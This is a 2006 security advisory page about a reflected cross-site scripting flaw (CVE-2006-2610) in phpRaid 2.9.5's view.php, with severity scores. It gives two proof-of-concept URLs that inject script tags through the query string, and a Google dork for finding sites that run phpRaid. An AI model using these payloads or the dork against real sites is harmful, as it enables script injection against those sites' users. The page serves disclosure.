Bug: phpRaid "view.php" XSS Vulnerability ( Ascii Version )

Search:
WLB2

phpRaid "view.php" XSS Vulnerability

Published
Credit
Risk
2006.05.27
TeufeL Online (teufel hotmail com)
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2006-2610
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
2.6/10
2.9/10
4.9/10
Exploit range
Attack complexity
Authentication
Remote
High
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

phpRaid "view.php" XSS Vulnerability

Script : phpRaid
Script Website : http://www.spiffyjr.com/
Version : phpRaid v2.9.5

This Xss Works On phpRaid

Exploit ;

1-)
Http://www.example.com/phpRaid/view.php?<script>alert('Xss%20Vulnerabili
ty');</script>

2-)
Http://www.example.com/phpRaid/view.php?mode=view&raid_id=6&Sort=><scrip
t>var%20Xss_Vulnerability=31033031;alert(Xss_Vulnerability);</script>

Google Dorks : inurl:"phpRaid"

TeufeL // Netkabus.Com Research And Develop Group

_________________________________________________________________
Real-time chat with your friends - Free download - MSN Messenger
http://messenger.msn.com/?mkt=tr

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version